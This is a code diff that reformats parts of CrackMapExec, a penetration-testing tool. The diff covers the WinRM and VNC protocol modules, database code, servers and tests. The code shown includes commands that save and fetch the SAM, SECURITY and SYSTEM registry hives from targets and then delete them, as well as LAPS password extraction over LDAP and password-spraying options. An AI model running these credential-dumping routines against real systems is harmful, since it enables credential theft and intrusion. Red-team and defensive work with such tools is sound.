- "credentials", self.metadata, autoload_with=self.db_engine - ) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) + self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): diff --git a/cme/protocols/vnc/db_navigator.py b/cme/protocols/vnc/db_navigator.py index b1afbf92..36777af1 100644 --- a/cme/protocols/vnc/db_navigator.py +++ b/cme/protocols/vnc/db_navigator.py @@ -6,12 +6,7 @@ from cme.cmedb import DatabaseNavigator, print_help class navigator(DatabaseNavigator): def do_clear_database(self, line): - if 
( - input( - "This will destroy all data in the current database, are you SURE you want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/winrm.py b/cme/protocols/winrm.py index 947808db..9cc1365e 100644 --- a/cme/protocols/winrm.py +++ b/cme/protocols/winrm.py @@ -31,9 +31,7 @@ class winrm(connection): @staticmethod def proto_args(parser, std_parser, module_parser): - winrm_parser = parser.add_parser( - "winrm", help="own stuff using WINRM", parents=[std_parser, module_parser] - ) + winrm_parser = parser.add_parser("winrm", help="own stuff using WINRM", parents=[std_parser, module_parser]) winrm_parser.add_argument( "-H", "--hash", @@ -46,22 +44,15 @@ class winrm(connection): winrm_parser.add_argument( "--no-bruteforce", action="store_true", - help=( - "No spray when using file for username and password (user1 =>" - " password1, user2 => password2" - ), + help=("No spray when using file for username and password (user1 =>" " password1, user2 => password2"), ) winrm_parser.add_argument( "--continue-on-success", action="store_true", help="continues authentication attempts even after successes", ) - winrm_parser.add_argument( - "--port", type=int, default=0, help="Custom WinRM port" - ) - winrm_parser.add_argument( - "--ssl", action="store_true", help="Connect to SSL Enabled WINRM" - ) + winrm_parser.add_argument("--port", type=int, default=0, help="Custom WinRM port") + winrm_parser.add_argument("--ssl", action="store_true", help="Connect to SSL Enabled WINRM") winrm_parser.add_argument( "--ignore-ssl-cert", action="store_true", @@ -98,23 +89,13 @@ class winrm(connection): help="authenticate locally to each target", ) - cgroup = winrm_parser.add_argument_group( - "Credential Gathering", "Options for gathering credentials" - ) + cgroup = winrm_parser.add_argument_group("Credential Gathering", "Options for gathering credentials") cegroup = cgroup.add_mutually_exclusive_group() - cegroup.add_argument( - "--sam", action="store_true", help="dump SAM hashes from target systems" - ) - cegroup.add_argument( - "--lsa", action="store_true", help="dump LSA secrets from target systems" - ) + cegroup.add_argument("--sam", action="store_true", help="dump SAM hashes from target systems") + cegroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems") - cgroup = winrm_parser.add_argument_group( - "Command Execution", "Options for executing commands" - ) - cgroup.add_argument( - "--no-output", action="store_true", help="do not retrieve command output" - ) + cgroup = winrm_parser.add_argument_group("Command Execution", "Options for executing commands") + cgroup.add_argument("--no-output", action="store_true", help="do not retrieve command output") cgroup.add_argument( "-x", metavar="COMMAND", @@ -159,9 +140,7 @@ class winrm(connection): no_ntlm = True pass - self.domain = ( - smb_conn.getServerDNSDomainName() if not no_ntlm else self.args.domain - ) + self.domain = smb_conn.getServerDNSDomainName() if not no_ntlm else self.args.domain self.hostname = smb_conn.getServerName() if not no_ntlm else self.host self.server_os = smb_conn.getServerOS() if isinstance(self.server_os.lower(), bytes): @@ -169,9 +148,7 @@ class winrm(connection): self.logger.extra["hostname"] = self.hostname - self.output_filename = os.path.expanduser( - 
f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") try: smb_conn.logoff() @@ -193,13 +170,9 @@ class winrm(connection): if self.domain is None: self.domain = "" - self.db.add_host( - self.host, self.port, self.hostname, self.domain, self.server_os - ) + self.db.add_host(self.host, self.port, self.hostname, self.domain, self.server_os) - self.output_filename = os.path.expanduser( - f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}" - ) + self.output_filename = os.path.expanduser(f"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}") self.output_filename = self.output_filename.replace(":", "-") def laps_search(self, username, password, ntlm_hash, domain): @@ -226,25 +199,17 @@ class winrm(connection): ntlm_hash[0] if ntlm_hash else "", ) if not connection: - self.logger.fail( - "LDAP connection failed with account {}".format(username[0]) - ) + self.logger.fail("LDAP connection failed with account {}".format(username[0])) return False - search_filter = ( - "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" - + self.hostname - + "))" - ) + search_filter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.hostname + "))" attributes = [ "msLAPS-EncryptedPassword", "msLAPS-Password", "ms-MCS-AdmPwd", "sAMAccountName", ] - results = connection.search( - searchFilter=search_filter, attributes=attributes, sizeLimit=0 - ) + results = connection.search(searchFilter=search_filter, attributes=attributes, sizeLimit=0) msMCSAdmPwd = "" sAMAccountName = "" @@ -252,20 +217,12 @@ class winrm(connection): from impacket.ldap import ldapasn1 as ldapasn1_impacket - results = [ - r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry) - ] + results = [r for r in results if isinstance(r, ldapasn1_impacket.SearchResultEntry)] if len(results) != 0: for host in results: - values = { - str(attr["type"]).lower(): str(attr["vals"][0]) - for attr in host["attributes"] - } + values = {str(attr["type"]).lower(): str(attr["vals"][0]) for attr in host["attributes"]} if "mslaps-encryptedpassword" in values: - self.logger.fail( - "LAPS password is encrypted and currently CrackMapExec doesn't" - " support the decryption..." 
- ) + self.logger.fail("LAPS password is encrypted and currently CrackMapExec doesn't" " support the decryption...") return False elif "mslaps-password" in values: from json import loads @@ -276,30 +233,17 @@ class winrm(connection): elif "ms-mcs-admpwd" in values: msMCSAdmPwd = values["ms-mcs-admpwd"] else: - self.logger.fail( - "No result found with attribute ms-MCS-AdmPwd or" - " msLAPS-Password" - ) - self.logger.debug( - "Host: {:<20} Password: {} {}".format( - sAMAccountName, msMCSAdmPwd, self.hostname - ) - ) + self.logger.fail("No result found with attribute ms-MCS-AdmPwd or" " msLAPS-Password") + self.logger.debug("Host: {:<20} Password: {} {}".format(sAMAccountName, msMCSAdmPwd, self.hostname)) else: - self.logger.fail( - "msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" - " property for {}".format(self.hostname) - ) + self.logger.fail("msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" " property for {}".format(self.hostname)) return False self.username = self.args.laps if not username else username self.password = msMCSAdmPwd if msMCSAdmPwd == "": - self.logger.fail( - "msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" - " property for {}".format(self.hostname) - ) + self.logger.fail("msMCSAdmPwd or msLAPS-Password is empty or account cannot read LAPS" " property for {}".format(self.hostname)) return False if ntlm_hash: hash_ntlm = hashlib.new("md4", msMCSAdmPwd.encode("utf-16le")).digest() @@ -314,16 +258,12 @@ class winrm(connection): self.logger.display(self.endpoint) else: self.logger.extra["protocol"] = "SMB" - self.logger.display( - f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})" - ) + self.logger.display(f"{self.server_os} (name:{self.hostname}) (domain:{self.domain})") self.logger.extra["protocol"] = "HTTP" self.logger.display(self.endpoint) if self.args.laps: - return self.laps_search( - self.args.username, self.args.password, self.args.hash, self.domain - ) + return self.laps_search(self.args.username, self.args.password, self.args.hash, self.domain) return True def create_conn_obj(self): @@ -336,27 +276,18 @@ class winrm(connection): try: self.logger.debug(f"winrm create_conn_obj() - Requesting URL: {url}") res = requests.post(url, verify=False, timeout=self.args.http_timeout) - self.logger.debug( - "winrm create_conn_obj() - Received response code:" - f" {res.status_code}" - ) + self.logger.debug("winrm create_conn_obj() - Received response code:" f" {res.status_code}") self.endpoint = url if self.endpoint.startswith("https://"): - self.logger.extra["port"] = ( - self.args.port if self.args.port else 5986 - ) + self.logger.extra["port"] = self.args.port if self.args.port else 5986 else: - self.logger.extra["port"] = ( - self.args.port if self.args.port else 5985 - ) + self.logger.extra["port"] = self.args.port if self.args.port else 5985 return True except requests.exceptions.Timeout as e: self.logger.info(f"Connection Timed out to WinRM service: {e}") except requests.exceptions.ConnectionError as e: if "Max retries exceeded with url" in str(e): - self.logger.info( - f"Connection Timeout to WinRM service (max retries exceeded)" - ) + self.logger.info(f"Connection Timeout to WinRM service (max retries exceeded)") else: self.logger.info(f"Other ConnectionError to WinRM service: {e}") return False @@ -400,13 +331,9 @@ class winrm(connection): # we could just authenticate without running a command :) (probably) self.conn.execute_ps("hostname") self.admin_privs = True - self.logger.success( - 
f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}" - ) + self.logger.success(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}") - self.logger.debug( - f"Adding credential: {domain}/{self.username}:{self.password}" - ) + self.logger.debug(f"Adding credential: {domain}/{self.username}:{self.password}") self.db.add_credential("plaintext", domain, self.username, self.password) # TODO: when we can easily get the host_id via RETURNING statements, readd this in # host_id = self.db.get_hosts(self.host)[0].id @@ -414,9 +341,7 @@ class winrm(connection): if self.admin_privs: self.logger.debug(f"Inside admin privs") - self.db.add_admin_user( - "plaintext", domain, self.username, self.password, self.host - ) # , user_id=user_id) + self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host) # , user_id=user_id) if not self.args.local_auth: add_user_bh(self.username, self.domain, self.logger, self.config) @@ -424,13 +349,9 @@ class winrm(connection): return True except Exception as e: if "with ntlm" in str(e): - self.logger.fail( - f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}") else: - self.logger.fail( - f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()} '{e}'" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()} '{e}'") return False @@ -488,9 +409,7 @@ class winrm(connection): # we could just authenticate without running a command :) (probably) self.conn.execute_ps("hostname") self.admin_privs = True - self.logger.success( - f"{self.domain}\\{self.username}:{process_secret(nthash)} {self.mark_pwned()}" - ) + self.logger.success(f"{self.domain}\\{self.username}:{process_secret(nthash)} {self.mark_pwned()}") self.db.add_credential("hash", domain, self.username, nthash) if self.admin_privs: @@ -503,23 +422,16 @@ class winrm(connection): except Exception as e: if "with ntlm" in str(e): - self.logger.fail( - f"{self.domain}\\{self.username}:{process_secret(nthash)}" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(nthash)}") else: - self.logger.fail( - f"{self.domain}\\{self.username}:{process_secret(nthash)} '{e}'" - ) + self.logger.fail(f"{self.domain}\\{self.username}:{process_secret(nthash)} '{e}'") return False def execute(self, payload=None, get_output=False): try: r = self.conn.execute_cmd(self.args.execute) except: - self.logger.info( - "Cannot execute command, probably because user is not local admin, but" - " powershell command should be ok!" 
-            )
+            self.logger.info("Cannot execute command, probably because user is not local admin, but" " powershell command should be ok!")
             r = self.conn.execute_ps(self.args.execute)
         self.logger.success("Executed command")
         self.logger.highlight(r[0])
@@ -530,15 +442,10 @@ class winrm(connection):
         self.logger.highlight(r[0])

     def sam(self):
-        self.conn.execute_cmd(
-            "reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM"
-            " C:\\windows\\temp\\SYSTEM"
-        )
+        self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM" " C:\\windows\\temp\\SYSTEM")
         self.conn.fetch("C:\\windows\\temp\\SAM", self.output_filename + ".sam")
         self.conn.fetch("C:\\windows\\temp\\SYSTEM", self.output_filename + ".system")
-        self.conn.execute_cmd(
-            "del C:\\windows\\temp\\SAM && del C:\\windows\\temp\\SYSTEM"
-        )
+        self.conn.execute_cmd("del C:\\windows\\temp\\SAM && del C:\\windows\\temp\\SYSTEM")

         local_operations = LocalOperations(f"{self.output_filename}.system")
         boot_key = local_operations.getBootKey()
@@ -552,17 +459,10 @@ class winrm(connection):
         SAM.export(f"{self.output_filename}.sam")

     def lsa(self):
-        self.conn.execute_cmd(
-            "reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM"
-            " C:\\windows\\temp\\SYSTEM"
-        )
-        self.conn.fetch(
-            "C:\\windows\\temp\\SECURITY", f"{self.output_filename}.security"
-        )
+        self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM" " C:\\windows\\temp\\SYSTEM")
+        self.conn.fetch("C:\\windows\\temp\\SECURITY", f"{self.output_filename}.security")
         self.conn.fetch("C:\\windows\\temp\\SYSTEM", f"{self.output_filename}.system")
-        self.conn.execute_cmd(
-            "del C:\\windows\\temp\\SYSTEM && del C:\\windows\\temp\\SECURITY"
-        )
+        self.conn.execute_cmd("del C:\\windows\\temp\\SYSTEM && del C:\\windows\\temp\\SECURITY")

         local_operations = LocalOperations(f"{self.output_filename}.system")
         boot_key = local_operations.getBootKey()
diff --git a/cme/protocols/winrm/database.py b/cme/protocols/winrm/database.py
index 672fb8d8..4921dd3a 100644
--- a/cme/protocols/winrm/database.py
+++ b/cme/protocols/winrm/database.py
@@ -73,25 +73,12 @@ class database:
     def reflect_tables(self):
         with self.db_engine.connect() as conn:
             try:
-                self.HostsTable = Table(
-                    "hosts", self.metadata, autoload_with=self.db_engine
-                )
-                self.UsersTable = Table(
-                    "users", self.metadata, autoload_with=self.db_engine
-                )
-                self.AdminRelationsTable = Table(
-                    "admin_relations", self.metadata, autoload_with=self.db_engine
-                )
-                self.LoggedinRelationsTable = Table(
-                    "loggedin_relations", self.metadata, autoload_with=self.db_engine
-                )
+                self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
+                self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine)
+                self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine)
+                self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine)
             except (NoInspectionAvailable, NoSuchTableError):
-                print(
-                    "[-] Error reflecting tables - this means there is a DB schema mismatch \n"
-                    "[-] This is probably because a newer version of CME is being ran on an old DB schema\n"
-                    "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n"
-                    "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema"
-                )
+                print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema")
                 exit()

     def shutdown_db(self):
@@ -152,9 +139,7 @@ class database:
         # TODO: find a way to abstract this away to a single Upsert call
         q = Insert(self.HostsTable)
         update_columns = {col.name: col for col in q.excluded if col.name not in "id"}
-        q = q.on_conflict_do_update(
-            index_elements=self.HostsTable.primary_key, set_=update_columns
-        )
+        q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns)
         self.conn.execute(q, hosts)

     def add_credential(self, credtype, domain, username, password, pillaged_from=None):
@@ -215,12 +200,8 @@ class database:

         # TODO: find a way to abstract this away to a single Upsert call
         q_users = Insert(self.UsersTable)  # .returning(self.UsersTable.c.id)
-        update_columns_users = {
-            col.name: col for col in q_users.excluded if col.name not in "id"
-        }
-        q_users = q_users.on_conflict_do_update(
-            index_elements=self.UsersTable.primary_key, set_=update_columns_users
-        )
+        update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"}
+        q_users = q_users.on_conflict_do_update(index_elements=self.UsersTable.primary_key, set_=update_columns_users)
         self.conn.execute(q_users, credentials)  # .scalar()
         # return user_ids

@@ -271,13 +252,9 @@ class database:

     def get_admin_relations(self, user_id=None, host_id=None):
         if user_id:
-            q = select(self.AdminRelationsTable).filter(
-                self.AdminRelationsTable.c.userid == user_id
-            )
+            q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id)
         elif host_id:
-            q = select(self.AdminRelationsTable).filter(
-                self.AdminRelationsTable.c.hostid == host_id
-            )
+            q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id)
         else:
             q = select(self.AdminRelationsTable)

@@ -317,9 +294,7 @@ class database:
         # if we're filtering by username
         elif filter_term and filter_term != "":
             like_term = func.lower(f"%{filter_term}%")
-            q = select(self.UsersTable).filter(
-                func.lower(self.UsersTable.c.username).like(like_term)
-            )
+            q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term))
         # otherwise return all credentials
         else:
             q = select(self.UsersTable)
@@ -328,15 +303,11 @@ class database:
         return results

     def is_credential_local(self, credential_id):
-        q = select(self.UsersTable.c.domain).filter(
-            self.UsersTable.c.id == credential_id
-        )
+        q = select(self.UsersTable.c.domain).filter(self.UsersTable.c.id == credential_id)
         user_domain = self.conn.execute(q).all()

         if user_domain:
-            q = select(self.HostsTable).filter(
-                func.lower(self.HostsTable.c.id) == func.lower(user_domain)
-            )
+            q = select(self.HostsTable).filter(func.lower(self.HostsTable.c.id) == func.lower(user_domain))

             results = self.conn.execute(q).all()
             return len(results) > 0
@@ -369,10 +340,7 @@ class database:
         # if we're filtering by ip/hostname
         elif filter_term and filter_term != "":
             like_term = func.lower(f"%{filter_term}%")
-            q = q.filter(
-                self.HostsTable.c.ip.like(like_term)
-                | func.lower(self.HostsTable.c.hostname).like(like_term)
-            )
+            q = q.filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term))
         results = self.conn.execute(q).all()
         cme_logger.debug(f"winrm get_hosts() - results: {results}")
         return results
@@ -417,9 +385,7 @@ class database:
         relation = {"userid": user_id, "hostid": host_id}
         try:
             # TODO: find a way to abstract this away to a single Upsert call
-            q = Insert(
-                self.LoggedinRelationsTable
-            )  # .returning(self.LoggedinRelationsTable.c.id)
+            q = Insert(self.LoggedinRelationsTable)  # .returning(self.LoggedinRelationsTable.c.id)
             self.conn.execute(q, [relation])  # .scalar()
             # return inserted_ids

@@ -427,9 +393,7 @@ class database:
             cme_logger.debug(f"Error inserting LoggedinRelation: {e}")

     def get_loggedin_relations(self, user_id=None, host_id=None):
-        q = select(
-            self.LoggedinRelationsTable
-        )  # .returning(self.LoggedinRelationsTable.c.id)
+        q = select(self.LoggedinRelationsTable)  # .returning(self.LoggedinRelationsTable.c.id)
         if user_id:
             q = q.filter(self.LoggedinRelationsTable.c.userid == user_id)
         if host_id:
diff --git a/cme/protocols/winrm/db_navigator.py b/cme/protocols/winrm/db_navigator.py
index 0d99754f..bf6ec589 100644
--- a/cme/protocols/winrm/db_navigator.py
+++ b/cme/protocols/winrm/db_navigator.py
@@ -182,9 +182,7 @@ class navigator(DatabaseNavigator):
             credtype = cred[4]
             pillaged_from = cred[5]

-            data.append(
-                [cred_id, credtype, pillaged_from, domain, username, password]
-            )
+            data.append([cred_id, credtype, pillaged_from, domain, username, password])
         print_table(data, title="Credential(s)")

         data = [["HostID", "IP", "Hostname", "Domain", "OS"]]
@@ -226,12 +224,7 @@ class navigator(DatabaseNavigator):
         print_help(help_string)

     def do_clear_database(self, line):
-        if (
-            input(
-                "This will destroy all data in the current database, are you SURE you want to run this? (y/n): "
-            )
-            == "y"
-        ):
+        if input("This will destroy all data in the current database, are you SURE you want to run this? (y/n): ") == "y":
             self.db.clear_database()

     def help_clear_database(self):
diff --git a/cme/servers/http.py b/cme/servers/http.py
index d7a17119..6d262b45 100755
--- a/cme/servers/http.py
+++ b/cme/servers/http.py
@@ -51,9 +51,7 @@ class RequestHandler(BaseHTTPRequestHandler):
         try:
             self.server.hosts.remove(self.client_address[0])
             if hasattr(self.server.module, "on_shutdown"):
-                self.server.module.on_shutdown(
-                    self.server.context, self.server.connection
-                )
+                self.server.module.on_shutdown(self.server.context, self.server.connection)
         except ValueError:
             pass

@@ -67,24 +65,18 @@ class CMEServer(threading.Thread):
             self.server.hosts = []
             self.server.module = module
             self.server.context = context
-            self.server.log = CMEAdapter(
-                extra={"module_name": self.server.module.name.upper()}
-            )
+            self.server.log = CMEAdapter(extra={"module_name": self.server.module.name.upper()})
             self.cert_path = os.path.join(os.path.expanduser("~/.cme"), "cme.pem")
             self.server.track_host = self.track_host

             logger.debug("CME server type: " + server_type)
             if server_type == "https":
-                self.server.socket = ssl.wrap_socket(
-                    self.server.socket, certfile=self.cert_path, server_side=True
-                )
+                self.server.socket = ssl.wrap_socket(self.server.socket, certfile=self.cert_path, server_side=True)

         except Exception as e:
             errno, message = e.args

             if errno == 98 and message == "Address already in use":
-                logger.error(
-                    "Error starting HTTP(S) server: the port is already in use, try specifying a diffrent port using --server-port"
-                )
+                logger.error("Error starting HTTP(S) server: the port is already in use, try specifying a diffrent port using --server-port")
             else:
                 logger.error(f"Error starting HTTP(S) server: {message}")
@@ -105,9 +97,7 @@ class CMEServer(threading.Thread):
     def shutdown(self):
         try:
             while len(self.server.hosts) > 0:
-                self.server.log.info(
-                    f"Waiting on {highlight(len(self.server.hosts))} host(s)"
-                )
+                self.server.log.info(f"Waiting on {highlight(len(self.server.hosts))} host(s)")
                 sleep(15)
         except KeyboardInterrupt:
             pass
diff --git a/cme/servers/smb.py b/cme/servers/smb.py
index 2befa078..b89333a5 100755
--- a/cme/servers/smb.py
+++ b/cme/servers/smb.py
@@ -28,9 +28,7 @@ class CMESMBServer(threading.Thread):
         except Exception as e:
             errno, message = e.args
             if errno == 98 and message == "Address already in use":
-                logger.error(
-                    "Error starting SMB server on port 445: the port is already in use"
-                )
+                logger.error("Error starting SMB server on port 445: the port is already in use")
             else:
                 logger.error(f"Error starting SMB server on port 445: {message}")
             exit(1)
diff --git a/tests/e2e_test.py b/tests/e2e_test.py
index b94db955..f449e529 100644
--- a/tests/e2e_test.py
+++ b/tests/e2e_test.py
@@ -5,9 +5,7 @@ from rich.console import Console


 def get_cli_args():
-    parser = argparse.ArgumentParser(
-        description=f"Script for running end to end tests for CME"
-    )
+    parser = argparse.ArgumentParser(description=f"Script for running end to end tests for CME")
     parser.add_argument("-t", "--target", dest="target", required=True)
     parser.add_argument("-u", "--user", "--username", dest="username", required=True)
     parser.add_argument("-p", "--pass", "--password", dest="password", required=True)
@@ -53,12 +51,7 @@ def generate_commands(args):
             if line.startswith("#"):
                 continue
             line = line.strip()
-            line = (
-                line.replace("TARGET_HOST", args.target)
-                .replace("USERNAME", f'"{args.username}"')
-                .replace("PASSWORD", f'"{args.password}"')
-                .replace("KERBEROS ", kerberos)
-            )
+            line = line.replace("TARGET_HOST", args.target).replace("USERNAME", f'"{args.username}"').replace("PASSWORD", f'"{args.password}"').replace("KERBEROS ", kerberos)
             lines.append(line)

     return lines
@@ -75,9 +68,7 @@ def run_e2e_tests(args):
     )
     version = result.communicate()[0].decode().strip()

-    with console.status(
-        f"[bold green] :brain: Running {len(tasks)} test commands for cme v{version}..."
-    ) as status:
+    with console.status(f"[bold green] :brain: Running {len(tasks)} test commands for cme v{version}...") as status:
         passed = 0
         failed = 0

diff --git a/tests/test_smb_database.py b/tests/test_smb_database.py
index cb592426..2fcb5025 100644
--- a/tests/test_smb_database.py
+++ b/tests/test_smb_database.py
@@ -17,9 +17,7 @@ from sqlalchemy.dialects.sqlite import Insert
 @pytest.fixture(scope="session")
 def db_engine():
     db_path = os.path.join(WS_PATH, "test/smb.db")
-    db_engine = create_engine(
-        f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True
-    )
+    db_engine = create_engine(f"sqlite:///{db_path}", isolation_level="AUTOCOMMIT", future=True)
     yield db_engine
     db_engine.dispose()